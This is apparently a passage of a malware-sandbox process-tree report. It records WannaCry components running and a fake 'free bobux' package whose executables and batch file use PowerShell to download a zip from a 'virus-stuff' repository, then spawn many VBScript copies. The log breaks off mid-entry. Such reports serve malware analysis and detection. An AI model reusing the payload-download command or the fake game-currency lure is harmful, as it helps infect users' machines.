- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:5840
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:3460
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2376
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:5808
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:5328
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:5592
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:5508
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:1512
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:2968
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  - Executes dropped EXE
  PID:4280
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  - Executes dropped EXE
  PID:4552
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:4740
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:4224
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:7720
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:7728
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:7808
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:10232
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:9244
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:9672
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:13204
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:13212
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:13268
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskse.exe
  taskse.exe C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  2⤵
  PID:8664
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\@[email protected]
  @[email protected]
  2⤵
  - Suspicious use of SetWindowsHookEx
  PID:9580
- C:\Users\Admin\AppData\Local\Temp\Temp1_Ransomware.WannaCry.zip\taskdl.exe
  taskdl.exe
  2⤵
  PID:11296

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2220

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1616

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\@[email protected]
1⤵
PID:5524

C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe
"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
1⤵
PID:5848
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\5D8A.tmp\5D8B.tmp\5D8C.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
  2⤵
  PID:4804
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:364

C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe
"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
1⤵
PID:912
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8381.tmp\8382.tmp\8383.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
  2⤵
  PID:2848
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:3596
- - C:\Windows\system32\timeout.exe
    timeout /t 10 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\free bobux.bat" "
1⤵
PID:1756
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:1852
- C:\Windows\system32\timeout.exe
  timeout /t 10 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:5740

C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\melter.exe
"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\melter.exe"
1⤵
PID:5360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\start.cmd" "
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:4264
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4400
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:5444
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:2848
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:1180
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:1080
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4464
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:336
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4560
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4664
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4892
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:5308
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:1968
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4252
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:264
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:5632
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:1548
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:2464
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:904
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:3820
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:2624
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:2436
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4916
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:5936
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:5740
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4516
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:3444
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4868
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:2184
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:2504
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:5836
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4960
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:3464
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:824
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:5076
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:3028
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:3980
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:5236
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4180
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:1616
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:5156
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4324
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:2612
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:524
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4564
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6044
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:1504
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4580
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:2076
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:3332
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6024
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:1420
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:2344
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:992
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:5532
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:5952
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:2604
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:712
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:5264
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:2200
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:2704
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:752
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:3848
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:3076
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:5112
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4824
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:2740
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:2196
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4920
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:4556
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:3888
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6164
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6176
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6188
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6212
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6288
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6344
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6360
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6372
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6428
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6436
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6468
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6512
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6532
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6560
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6596
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6616
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6660
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6688
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6716
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6744
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6772
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6800
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6816
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6836
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6960
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6992
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7080
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7108
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7132
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:6340
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7208
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7232
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7284
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7304
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7328
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7368
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7396
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7416
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7452
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7480
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7508
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7520
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7564
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7580
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7620
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7632
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\hamburger.vbs"
  2⤵
  PID:7668

C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe
"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
1⤵
PID:8488
- C:\Windows\system32\cmd.exe
